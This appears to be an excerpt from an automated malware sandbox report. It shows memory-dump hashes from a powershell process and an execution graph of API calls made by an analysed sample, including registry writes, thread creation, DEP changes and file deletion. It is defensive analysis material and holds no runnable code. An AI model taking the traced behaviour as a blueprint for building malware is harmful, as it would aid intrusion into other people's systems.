                                                                  control_flow_graph 239 29fe48-29fed6 ResumeThread 242 29fed8-29fede 239->242 243 29fedf-29ff21 239->243 242->243
                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 0029FEC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 78ef276a247d1bf60bb09e33b7273922ce11056a175a4229fb24847c3bc8ed59
                                                                  • Instruction ID: 9a04ccee50a88c7f4cf31142c34e5d54fa8dc50b88073d1da8324588f9eb26e0
                                                                  • Opcode Fuzzy Hash: 78ef276a247d1bf60bb09e33b7273922ce11056a175a4229fb24847c3bc8ed59
                                                                  • Instruction Fuzzy Hash: 7C31DBB4D102089FCF10DFAAD984AEEFBB4AF89310F20942AE814B7350C734A905CF55
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 19a53960b5ab2fc07c61a805376a5f7fb49ea6381b314141e6def08bb7b2b7be
                                                                  • Instruction ID: 7deff16d10013eca52aad0247ec0bd4cc4758ca50235f8db30e1b55a3ec83013
                                                                  • Opcode Fuzzy Hash: 19a53960b5ab2fc07c61a805376a5f7fb49ea6381b314141e6def08bb7b2b7be
                                                                  • Instruction Fuzzy Hash: 5F41E331700205CFEF25AF64C450BAEB7A6AB85311F248C6BE8568B6A1C778DC52CB46
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 483579d3170bdd844c2adc918a3646861844710ca323c3e5303b696c7689143e
                                                                  • Instruction ID: c7f1a99cf6654bcf0296ec0ab249a28750172e48b1e208379c53ccf85434eff9
                                                                  • Opcode Fuzzy Hash: 483579d3170bdd844c2adc918a3646861844710ca323c3e5303b696c7689143e
                                                                  • Instruction Fuzzy Hash: 5A416F74B04245DFC729DB18CA90A2AF7B2AF85314B18C5EBD8198B352C776DC42CB55
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 216d81bf849e58f156810b1ae4fc258b7b053a9a9ec00967ec52a52ea4db941c
                                                                  • Instruction ID: 6371a31f488039adbc9b39d8034f7c2697f19182e23af452baafd584f5c14d5b
                                                                  • Opcode Fuzzy Hash: 216d81bf849e58f156810b1ae4fc258b7b053a9a9ec00967ec52a52ea4db941c
                                                                  • Instruction Fuzzy Hash: 1F217B31B242068FDB6876A498101AFF392ABE1324B20887BC865D7351DF75DC0AC756
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376126278.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1dd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b25cc51d9b63418ae75bded7133c7563c7252f6ba59f027540479b8d8226c83e
                                                                  • Instruction ID: a8eb4585c31714653ef3f753eb3954984cd949a137b4dc1b686f32f9e3619cf6
                                                                  • Opcode Fuzzy Hash: b25cc51d9b63418ae75bded7133c7563c7252f6ba59f027540479b8d8226c83e
                                                                  • Instruction Fuzzy Hash: BB01DF31104340AAEB205A25ECC4B66BB98DFC1324F28C01AEC480A282D3799945CAB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376126278.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1dd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e87f00ab44922768c990fb7e49e0784bbe25ac52d1a3f3800111758d4d80a343
                                                                  • Instruction ID: 5db54de2ae77c648a711376a51e56f4d5b2548f66db1d1b098e4d5010f1fa8e5
                                                                  • Opcode Fuzzy Hash: e87f00ab44922768c990fb7e49e0784bbe25ac52d1a3f3800111758d4d80a343
                                                                  • Instruction Fuzzy Hash: 5A015E6140D3C09FD7128B259C94B52BFB4DF93224F1981DBE8888F2A3D2699848C772
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10792ce6c4e49d231463d418a285a4842937573fe703404c3886155fdb2f347e
                                                                  • Instruction ID: 489fddd5e1787175a18e6a2382505e702d518b66df0c16ab8f8701cbfa999a11
                                                                  • Opcode Fuzzy Hash: 10792ce6c4e49d231463d418a285a4842937573fe703404c3886155fdb2f347e
                                                                  • Instruction Fuzzy Hash: 21E0D832B142448ADFA57660D0613FFB751AFE3210F108C97C461A7355CB38890EC317
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UUUU
                                                                  • API String ID: 0-1798160573
                                                                  • Opcode ID: 7e4fe732ca73fe90cedc439221e04ffda442d66887d1c8dfb6b6f95aaaa22338
                                                                  • Instruction ID: 049ea198012b2c256c19008c74dd95aeb27a561af9b30cda8deb4541a62c2ac6
                                                                  • Opcode Fuzzy Hash: 7e4fe732ca73fe90cedc439221e04ffda442d66887d1c8dfb6b6f95aaaa22338
                                                                  • Instruction Fuzzy Hash: 76128171E106598BDF54CFAAC98059DFBF2BF88304F28C529D418EB21AD734A946CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D$p
                                                                  • API String ID: 0-2801081026
                                                                  • Opcode ID: 2e35f3adafb05b21939fbf8f2f2a691c7a650f721ebd789f2cc3681dfdcc3f36
                                                                  • Instruction ID: 36eab1dbde51d7bf25eccbf62725958f8b970167b4baa2884ec0abe3a36e6bd1
                                                                  • Opcode Fuzzy Hash: 2e35f3adafb05b21939fbf8f2f2a691c7a650f721ebd789f2cc3681dfdcc3f36
                                                                  • Instruction Fuzzy Hash: 7DD1B474E10218CFDB54DFA9D894A9DBBF2BF89300F1085A9E409AB365DB71AD81CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D$p
                                                                  • API String ID: 0-2801081026
                                                                  • Opcode ID: 6a870b2f612c4850189a822dd350442ca7a7f5a5fb020f6cd0e65eb8a7317229
                                                                  • Instruction ID: 5cdbc5dfbad0eaedfa74c6a479aaaccadb94ec8d6696658c31da5f772ec351fa
                                                                  • Opcode Fuzzy Hash: 6a870b2f612c4850189a822dd350442ca7a7f5a5fb020f6cd0e65eb8a7317229
                                                                  • Instruction Fuzzy Hash: 25A11774E10218CFDB54DF69D894A9DBBF2BF89300F1484AAE409AB365DB71AD81CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: b68a05291534b5a41d534e2a2f337efd523d9f737c6dd40ce430c051b4379b40
                                                                  • Instruction ID: 6435db4734bf56e3166d714e99d43a7248b8dc4a23debc71109ca4311fe86315
                                                                  • Opcode Fuzzy Hash: b68a05291534b5a41d534e2a2f337efd523d9f737c6dd40ce430c051b4379b40
                                                                  • Instruction Fuzzy Hash: 7421F7B1D106298BEB18CF6ADC4479EBAF6BFC8304F04D1AAD50CA6255DB700A81CF05
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f87ca8b02aacd3491f9d6619d4b2ee3577bfb84ba45aafc581e52f5bb6904971
                                                                  • Instruction ID: 7de3e653a9730f553fa2ccfb0a91927ddc4a256619021cd4ca4a68d0e84e50d5
                                                                  • Opcode Fuzzy Hash: f87ca8b02aacd3491f9d6619d4b2ee3577bfb84ba45aafc581e52f5bb6904971
                                                                  • Instruction Fuzzy Hash: 6D91893181E3C59FCB02EB78D8A45D97FB0AF46214B0A40D7D485DF263D228899AC766
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bc1d7054debc579bb0ec4a2ed8d77155524d43cf46f2559d1c3426ae73f0bb6
                                                                  • Instruction ID: 65fb5e5aea0a0c40566a6985747ec2f0408126f519990defd7b4bd01aa375a93
                                                                  • Opcode Fuzzy Hash: 2bc1d7054debc579bb0ec4a2ed8d77155524d43cf46f2559d1c3426ae73f0bb6
                                                                  • Instruction Fuzzy Hash: F2711271D102058FDB48EF6AE855A8EBBF3BFC4300F14C529D418AB369EFB45A468B51
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22cd97a2f3cebb9879f7d52481cc1099e4d815066b47eadbc86fbabec4fe42f5
                                                                  • Instruction ID: ea8e63164694d816a74bb1de9440789b46b3328a9ca790a30f4f78662c48f330
                                                                  • Opcode Fuzzy Hash: 22cd97a2f3cebb9879f7d52481cc1099e4d815066b47eadbc86fbabec4fe42f5
                                                                  • Instruction Fuzzy Hash: 30611271D102058FDB48EF6AE855A8EBBF3BFC4300F14C529D418AB369EFB45A468B51
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e544bb4ede7d0a94f965525c8aa82c3f61f5b15e395d568cf8bf504d46179f86
                                                                  • Instruction ID: 1c4bb57b50eeb41a7ed1e306d81e5ebd8589c0f40685136dbc4feae7de780b29
                                                                  • Opcode Fuzzy Hash: e544bb4ede7d0a94f965525c8aa82c3f61f5b15e395d568cf8bf504d46179f86
                                                                  • Instruction Fuzzy Hash: 954138B5E016189BDB18CFABD94059EFBF3AFD8300F15C17AD808AB265EB3059428F54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (:,$(:,$(:,$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,$l;,
                                                                  • API String ID: 0-3970712022
                                                                  • Opcode ID: 3a84869433002a91ba812a2301030103d214236525d524b0a3c5d9360b4d5d1c
                                                                  • Instruction ID: ba88569cda0d6e871a77932b690d1c6f51510688e18710e04dc1d84afd0658f4
                                                                  • Opcode Fuzzy Hash: 3a84869433002a91ba812a2301030103d214236525d524b0a3c5d9360b4d5d1c
                                                                  • Instruction Fuzzy Hash: D8E15631710208EFDB65AE64C4107BF77A2AFC1310F248867E9459B392CB79DD49CBA6

                                                                  Execution Graph

                                                                  Execution Coverage:4.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:4.6%
                                                                  Total number of Nodes:1525
                                                                  Total number of Limit Nodes:53
                                                                  execution_graph 47034 445847 47035 445852 47034->47035 47037 44587b 47035->47037 47038 445877 47035->47038 47040 448a84 47035->47040 47047 44589f DeleteCriticalSection 47037->47047 47048 4484ca 47040->47048 47043 448ac9 InitializeCriticalSectionAndSpinCount 47046 448ab4 47043->47046 47045 448ae0 47045->47035 47055 434fcb 47046->47055 47047->47038 47049 4484f6 47048->47049 47050 4484fa 47048->47050 47049->47050 47054 44851a 47049->47054 47062 448566 47049->47062 47050->47043 47050->47046 47052 448526 GetProcAddress 47053 448536 __crt_fast_encode_pointer 47052->47053 47053->47050 47054->47050 47054->47052 47056 434fd6 IsProcessorFeaturePresent 47055->47056 47057 434fd4 47055->47057 47059 435018 47056->47059 47057->47045 47069 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47059->47069 47061 4350fb 47061->47045 47063 448587 LoadLibraryExW 47062->47063 47068 44857c 47062->47068 47064 4485a4 GetLastError 47063->47064 47065 4485bc 47063->47065 47064->47065 47066 4485af LoadLibraryExW 47064->47066 47067 4485d3 FreeLibrary 47065->47067 47065->47068 47066->47065 47067->47068 47068->47049 47069->47061 47070 434887 47071 434893 ___FrameUnwindToState 47070->47071 47097 434596 47071->47097 47073 43489a 47075 4348c3 47073->47075 47403 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47073->47403 47082 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47075->47082 47108 444251 47075->47108 47079 4348e2 ___FrameUnwindToState 47080 434962 47116 434b14 47080->47116 47082->47080 47404 4433e7 36 API calls 6 library calls 47082->47404 47090 434984 47091 43498e 47090->47091 47406 44341f 28 API calls _abort 47090->47406 47093 434997 47091->47093 47407 4433c2 28 API calls _abort 47091->47407 47408 43470d 13 API calls 2 library calls 47093->47408 47096 43499f 47096->47079 47098 43459f 47097->47098 47409 434c52 IsProcessorFeaturePresent 47098->47409 47100 4345ab 47410 438f31 47100->47410 47102 4345b0 47107 4345b4 47102->47107 47419 4440bf 47102->47419 47105 4345cb 47105->47073 47107->47073 47109 444268 47108->47109 47110 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47109->47110 47111 4348dc 47110->47111 47111->47079 47112 4441f5 47111->47112 47113 444224 47112->47113 47114 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47113->47114 47115 44424d 47114->47115 47115->47082 47469 436e90 47116->47469 47119 434968 47120 4441a2 47119->47120 47471 44f059 47120->47471 47122 4441ab 47123 434971 47122->47123 47475 446815 36 API calls 47122->47475 47125 40e9c5 47123->47125 47646 41cb50 LoadLibraryA GetProcAddress 47125->47646 47127 40e9e1 GetModuleFileNameW 47651 40f3c3 47127->47651 47129 40e9fd 47666 4020f6 47129->47666 47132 4020f6 28 API calls 47133 40ea1b 47132->47133 47672 41be1b 47133->47672 47137 40ea2d 47698 401e8d 47137->47698 47139 40ea36 47140 40ea93 47139->47140 47141 40ea49 47139->47141 47704 401e65 47140->47704 47973 40fbb3 93 API calls 47141->47973 47144 40eaa3 47148 401e65 22 API calls 47144->47148 47145 40ea5b 47146 401e65 22 API calls 47145->47146 47147 40ea67 47146->47147 47974 410f37 36 API calls __EH_prolog 47147->47974 47149 40eac2 47148->47149 47709 40531e 47149->47709 47152 40ead1 47714 406383 47152->47714 47153 40ea79 47975 40fb64 78 API calls 47153->47975 47157 40ea82 47976 40f3b0 71 API calls 47157->47976 47163 401fd8 11 API calls 47165 40eefb 47163->47165 47164 401fd8 11 API calls 47166 40eafb 47164->47166 47405 4432f6 GetModuleHandleW 47165->47405 47167 401e65 22 API calls 47166->47167 47168 40eb04 47167->47168 47731 401fc0 47168->47731 47170 40eb0f 47171 401e65 22 API calls 47170->47171 47172 40eb28 47171->47172 47173 401e65 22 API calls 47172->47173 47174 40eb43 47173->47174 47175 40ebae 47174->47175 47977 406c1e 47174->47977 47176 401e65 22 API calls 47175->47176 47182 40ebbb 47176->47182 47178 40eb70 47179 401fe2 28 API calls 47178->47179 47180 40eb7c 47179->47180 47183 401fd8 11 API calls 47180->47183 47181 40ec02 47735 40d069 47181->47735 47182->47181 47188 413549 3 API calls 47182->47188 47185 40eb85 47183->47185 47982 413549 RegOpenKeyExA 47185->47982 47186 40ec08 47187 40ea8b 47186->47187 47738 41b2c3 47186->47738 47187->47163 47194 40ebe6 47188->47194 47192 40f34f 48065 4139a9 30 API calls 47192->48065 47193 40ec23 47196 40ec76 47193->47196 47755 407716 47193->47755 47194->47181 47985 4139a9 30 API calls 47194->47985 47197 401e65 22 API calls 47196->47197 47200 40ec7f 47197->47200 47209 40ec90 47200->47209 47210 40ec8b 47200->47210 47202 40f365 48066 412475 65 API calls ___scrt_get_show_window_mode 47202->48066 47203 40ec42 47986 407738 30 API calls 47203->47986 47204 40ec4c 47207 401e65 22 API calls 47204->47207 47219 40ec55 47207->47219 47208 40f36f 47212 41bc5e 28 API calls 47208->47212 47215 401e65 22 API calls 47209->47215 47989 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47210->47989 47211 40ec47 47987 407260 98 API calls 47211->47987 47216 40f37f 47212->47216 47217 40ec99 47215->47217 47865 413a23 RegOpenKeyExW 47216->47865 47759 41bc5e 47217->47759 47219->47196 47224 40ec71 47219->47224 47220 40eca4 47763 401f13 47220->47763 47988 407260 98 API calls 47224->47988 47226 401f09 11 API calls 47228 40f39c 47226->47228 47231 401f09 11 API calls 47228->47231 47233 40f3a5 47231->47233 47232 401e65 22 API calls 47234 40ecc1 47232->47234 47868 40dd42 47233->47868 47238 401e65 22 API calls 47234->47238 47240 40ecdb 47238->47240 47239 40f3af 47241 401e65 22 API calls 47240->47241 47242 40ecf5 47241->47242 47243 401e65 22 API calls 47242->47243 47245 40ed0e 47243->47245 47244 40ed7b 47247 40ed8a 47244->47247 47252 40ef06 ___scrt_get_show_window_mode 47244->47252 47245->47244 47246 401e65 22 API calls 47245->47246 47251 40ed23 _wcslen 47246->47251 47248 40ed93 47247->47248 47276 40ee0f ___scrt_get_show_window_mode 47247->47276 47249 401e65 22 API calls 47248->47249 47250 40ed9c 47249->47250 47253 401e65 22 API calls 47250->47253 47251->47244 47254 401e65 22 API calls 47251->47254 48050 4136f8 RegOpenKeyExA 47252->48050 47255 40edae 47253->47255 47256 40ed3e 47254->47256 47258 401e65 22 API calls 47255->47258 47260 401e65 22 API calls 47256->47260 47259 40edc0 47258->47259 47263 401e65 22 API calls 47259->47263 47261 40ed53 47260->47261 47990 40da34 47261->47990 47262 40ef51 47264 401e65 22 API calls 47262->47264 47266 40ede9 47263->47266 47267 40ef76 47264->47267 47271 401e65 22 API calls 47266->47271 47785 402093 47267->47785 47269 401f13 28 API calls 47270 40ed72 47269->47270 47273 401f09 11 API calls 47270->47273 47274 40edfa 47271->47274 47273->47244 48048 40cdf9 45 API calls _wcslen 47274->48048 47275 40ef88 47791 41376f RegCreateKeyA 47275->47791 47775 413947 47276->47775 47281 40eea3 ctype 47285 401e65 22 API calls 47281->47285 47282 40ee0a 47282->47276 47283 401e65 22 API calls 47284 40efaa 47283->47284 47797 43baac 47284->47797 47288 40eeba 47285->47288 47288->47262 47289 40eece 47288->47289 47291 401e65 22 API calls 47289->47291 47290 40efc1 48053 41cd9b 87 API calls ___scrt_get_show_window_mode 47290->48053 47293 40eed7 47291->47293 47292 40efe4 47295 402093 28 API calls 47292->47295 47296 41bc5e 28 API calls 47293->47296 47298 40eff9 47295->47298 47299 40eee3 47296->47299 47297 40efc8 CreateThread 47297->47292 48873 41d45d 10 API calls 47297->48873 47300 402093 28 API calls 47298->47300 48049 40f474 104 API calls 47299->48049 47302 40f008 47300->47302 47801 41b4ef 47302->47801 47303 40eee8 47303->47262 47305 40eeef 47303->47305 47305->47187 47307 401e65 22 API calls 47308 40f019 47307->47308 47309 401e65 22 API calls 47308->47309 47310 40f02b 47309->47310 47311 401e65 22 API calls 47310->47311 47312 40f04b 47311->47312 47313 43baac _strftime 40 API calls 47312->47313 47314 40f058 47313->47314 47315 401e65 22 API calls 47314->47315 47316 40f063 47315->47316 47317 401e65 22 API calls 47316->47317 47318 40f074 47317->47318 47319 401e65 22 API calls 47318->47319 47320 40f089 47319->47320 47321 401e65 22 API calls 47320->47321 47322 40f09a 47321->47322 47323 40f0a1 StrToIntA 47322->47323 47825 409de4 47323->47825 47326 401e65 22 API calls 47327 40f0bc 47326->47327 47328 40f101 47327->47328 47329 40f0c8 47327->47329 47331 401e65 22 API calls 47328->47331 48054 4344ea 47329->48054 47333 40f111 47331->47333 47337 40f159 47333->47337 47338 40f11d 47333->47338 47334 401e65 22 API calls 47335 40f0e4 47334->47335 47336 40f0eb CreateThread 47335->47336 47336->47328 48876 419fb4 103 API calls 2 library calls 47336->48876 47339 401e65 22 API calls 47337->47339 47340 4344ea new 22 API calls 47338->47340 47341 40f162 47339->47341 47342 40f126 47340->47342 47345 40f1cc 47341->47345 47346 40f16e 47341->47346 47343 401e65 22 API calls 47342->47343 47344 40f138 47343->47344 47349 40f13f CreateThread 47344->47349 47347 401e65 22 API calls 47345->47347 47348 401e65 22 API calls 47346->47348 47350 40f1d5 47347->47350 47351 40f17e 47348->47351 47349->47337 48875 419fb4 103 API calls 2 library calls 47349->48875 47352 40f1e1 47350->47352 47353 40f21a 47350->47353 47354 401e65 22 API calls 47351->47354 47356 401e65 22 API calls 47352->47356 47850 41b60d 47353->47850 47357 40f193 47354->47357 47359 40f1ea 47356->47359 48061 40d9e8 31 API calls 47357->48061 47364 401e65 22 API calls 47359->47364 47360 401f13 28 API calls 47361 40f22e 47360->47361 47363 401f09 11 API calls 47361->47363 47367 40f237 47363->47367 47368 40f1ff 47364->47368 47365 40f1a6 47366 401f13 28 API calls 47365->47366 47369 40f1b2 47366->47369 47370 40f240 SetProcessDEPPolicy 47367->47370 47371 40f243 CreateThread 47367->47371 47377 43baac _strftime 40 API calls 47368->47377 47372 401f09 11 API calls 47369->47372 47370->47371 47373 40f264 47371->47373 47374 40f258 CreateThread 47371->47374 48845 40f7a7 47371->48845 47378 40f1bb CreateThread 47372->47378 47375 40f279 47373->47375 47376 40f26d CreateThread 47373->47376 47374->47373 48877 4120f7 138 API calls 47374->48877 47380 40f2cc 47375->47380 47382 402093 28 API calls 47375->47382 47376->47375 48872 4126db 38 API calls ___scrt_get_show_window_mode 47376->48872 47379 40f20c 47377->47379 47378->47345 48874 401be9 50 API calls _strftime 47378->48874 48062 40c162 7 API calls 47379->48062 47862 4134ff RegOpenKeyExA 47380->47862 47383 40f29c 47382->47383 48063 4052fd 28 API calls 47383->48063 47388 40f2ed 47390 41bc5e 28 API calls 47388->47390 47392 40f2fd 47390->47392 48064 41361b 31 API calls 47392->48064 47397 40f313 47398 401f09 11 API calls 47397->47398 47401 40f31e 47398->47401 47399 40f346 DeleteFileW 47400 40f34d 47399->47400 47399->47401 47400->47208 47401->47208 47401->47399 47402 40f334 Sleep 47401->47402 47402->47401 47403->47073 47404->47080 47405->47090 47406->47091 47407->47093 47408->47096 47409->47100 47411 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47410->47411 47423 43a43a 47411->47423 47415 438f4c 47416 438f57 47415->47416 47437 43a476 DeleteCriticalSection 47415->47437 47416->47102 47418 438f44 47418->47102 47465 44fb68 47419->47465 47422 438f5a 8 API calls 3 library calls 47422->47107 47424 43a443 47423->47424 47426 43a46c 47424->47426 47427 438f40 47424->47427 47438 438e7f 47424->47438 47443 43a476 DeleteCriticalSection 47426->47443 47427->47418 47429 43a3ec 47427->47429 47458 438d94 47429->47458 47431 43a3f6 47436 43a401 47431->47436 47463 438e42 6 API calls try_get_function 47431->47463 47433 43a40f 47434 43a41c 47433->47434 47464 43a41f 6 API calls ___vcrt_FlsFree 47433->47464 47434->47415 47436->47415 47437->47418 47444 438c73 47438->47444 47441 438eb6 InitializeCriticalSectionAndSpinCount 47442 438ea2 47441->47442 47442->47424 47443->47427 47445 438ca3 47444->47445 47446 438ca7 47444->47446 47445->47446 47449 438cc7 47445->47449 47451 438d13 47445->47451 47446->47441 47446->47442 47448 438cd3 GetProcAddress 47450 438ce3 __crt_fast_encode_pointer 47448->47450 47449->47446 47449->47448 47450->47446 47452 438d3b LoadLibraryExW 47451->47452 47457 438d30 47451->47457 47453 438d57 GetLastError 47452->47453 47454 438d6f 47452->47454 47453->47454 47455 438d62 LoadLibraryExW 47453->47455 47456 438d86 FreeLibrary 47454->47456 47454->47457 47455->47454 47456->47457 47457->47445 47459 438c73 try_get_function 5 API calls 47458->47459 47460 438dae 47459->47460 47461 438dc6 TlsAlloc 47460->47461 47462 438db7 47460->47462 47462->47431 47463->47433 47464->47436 47468 44fb81 47465->47468 47466 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47467 4345bd 47466->47467 47467->47105 47467->47422 47468->47466 47470 434b27 GetStartupInfoW 47469->47470 47470->47119 47472 44f06b 47471->47472 47473 44f062 47471->47473 47472->47122 47476 44ef58 47473->47476 47475->47122 47496 448215 GetLastError 47476->47496 47478 44ef65 47517 44f077 47478->47517 47480 44ef6d 47526 44ecec 47480->47526 47483 44ef84 47483->47472 47489 44efc2 47550 4405dd 20 API calls __dosmaperr 47489->47550 47490 44efdf 47492 44f00b 47490->47492 47552 446782 20 API calls _free 47490->47552 47495 44efc7 47492->47495 47553 44ebc2 20 API calls 47492->47553 47551 446782 20 API calls _free 47495->47551 47497 448237 47496->47497 47498 44822b 47496->47498 47555 445af3 20 API calls 3 library calls 47497->47555 47554 4487bc 11 API calls 2 library calls 47498->47554 47501 448231 47501->47497 47503 448280 SetLastError 47501->47503 47502 448243 47504 44824b 47502->47504 47557 448812 11 API calls 2 library calls 47502->47557 47503->47478 47556 446782 20 API calls _free 47504->47556 47507 448260 47507->47504 47509 448267 47507->47509 47508 448251 47510 44828c SetLastError 47508->47510 47558 448087 20 API calls __Toupper 47509->47558 47560 4460f4 36 API calls 4 library calls 47510->47560 47513 448272 47559 446782 20 API calls _free 47513->47559 47514 448298 47516 448279 47516->47503 47516->47510 47518 44f083 ___FrameUnwindToState 47517->47518 47519 448215 __Toupper 36 API calls 47518->47519 47524 44f08d 47519->47524 47521 44f111 ___FrameUnwindToState 47521->47480 47524->47521 47561 4460f4 36 API calls 4 library calls 47524->47561 47562 445888 EnterCriticalSection 47524->47562 47563 446782 20 API calls _free 47524->47563 47564 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47524->47564 47565 43a7b7 47526->47565 47529 44ed0d GetOEMCP 47531 44ed36 47529->47531 47530 44ed1f 47530->47531 47532 44ed24 GetACP 47530->47532 47531->47483 47533 446137 47531->47533 47532->47531 47534 446175 47533->47534 47538 446145 __Getctype 47533->47538 47576 4405dd 20 API calls __dosmaperr 47534->47576 47536 446160 RtlAllocateHeap 47537 446173 47536->47537 47536->47538 47537->47495 47540 44f119 47537->47540 47538->47534 47538->47536 47575 442f80 7 API calls 2 library calls 47538->47575 47541 44ecec 38 API calls 47540->47541 47544 44f138 47541->47544 47542 44f13f 47543 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47542->47543 47545 44efba 47543->47545 47544->47542 47546 44f189 IsValidCodePage 47544->47546 47549 44f1ae ___scrt_get_show_window_mode 47544->47549 47545->47489 47545->47490 